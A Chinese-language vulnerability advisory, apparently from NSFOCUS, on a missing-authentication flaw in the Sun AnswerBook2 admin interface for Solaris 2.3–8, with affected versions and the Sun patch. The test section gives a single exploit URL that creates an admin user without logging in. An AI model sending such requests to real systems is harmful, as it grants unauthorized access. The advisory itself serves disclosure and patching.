首页 -> 安全研究

安全研究

安全漏洞
Solaris AnswerBook2 管理界面权限确认漏洞

发布日期:2000-08-11
更新日期:2000-08-11

受影响系统:

Sun AnswerBook2 1.3.x
Sun AnswerBook2 1.4
Sun AnswerBook2 1.4.1
Sun AnswerBook2 1.4.2
       - Sun Solaris 8
       - Sun Solaris 7
       - Sun Solaris 2.6
       - Sun Solaris 2.5.1
       - Sun Solaris 2.4
       - Sun Solaris 2.3

描述:

Sun AnswerBook2 1.4.2及其以前版本的某些脚本在管理界面上缺乏身份验证,远程
用户通过这些脚本可以创建用户,进而可以读取日志文件、破坏系统等等。

<* 来源:Lluis Mora (llmora@s21sec.com) *>








测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


下列命令可以创建用户:

http://www.example.com:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe



建议:
下面是针对该漏洞的补丁:

Sun AnswerBook2 1.4.2:
Sun patch 110011-02
http://www.sun.com/software/ab2/dwnld_versions.html

其他版本的应当更新到1.4.2




浏览次数:6002
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客